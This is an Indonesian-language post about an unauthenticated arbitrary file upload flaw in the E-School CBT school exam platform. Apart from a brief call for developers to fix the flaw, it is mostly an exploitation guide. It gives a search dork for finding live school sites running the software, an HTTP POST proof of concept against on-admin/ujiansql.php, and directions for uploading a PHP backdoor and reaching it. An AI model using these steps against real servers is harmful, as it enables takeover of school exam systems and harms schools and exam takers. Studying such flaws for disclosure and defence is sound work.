E-School CBT adalah salah satu platform arau media ujian berbasis komputer (Computer Based Test) yang dikembangkan di Indonesia. Sebagai platform, sudah semestinya menghindari beberapa hal yang dapat merugikan.

E-School masih dalam tahap pengembangan untuk meningkatkan kualitas serta keamanan media tersebut. Paling tidak, dengan segera menutup celah keamanan yang dimilikinya yang dapat merugikan pihak sekolah maupun para peserta ujian.

Berikut merupakan langkah atau cara eksploitasi celah keamanan arbitrary file upload (upload file sembarang) yang tidak ter-otentikasi sehingga memungkinkan penyerang meng-upload sebuah malware tanpa di-otentikasi terlebih dahulu filenya.

Versi Terdampak

Saat ini dari hasil riset kami, yang berhasil untuk diserang keamanannya ada dalam versi terbaru aplikasi ini, namun sepertinya para developer sendiri telah menghapus beberapa path folder atau file yang menyebabkan celah keamanan tersebut.

Cara Eksploitasi

Jika kamu ingin menemukan website apa saja yang memakai aplikasi CBT ini, kamu bisa melakukannya menggunakan dork berikut:

intitle: E-School CBT site:id

PoC:

POST [cbt-path]/on-admin/ujiansql.php HTTP /1.1
Host: target.site
Content-Type: application/x-www-form-urlencoded

files=[file_kamu].php

Jika website mengalami redirect pada halaman login admin, maka itu berarti vulnerable untuk diserang. Lalu, eksploitasi dengan menggunakan keterangan PoC di atas dan upload file terserah yang kamu inginkan.

Misal, jika kamu mengupload file backdoor bernama mybackdoor.php maka file tersebut akan berada pada http://target.site/[cbt-path]/on-admin/mybackdoor.php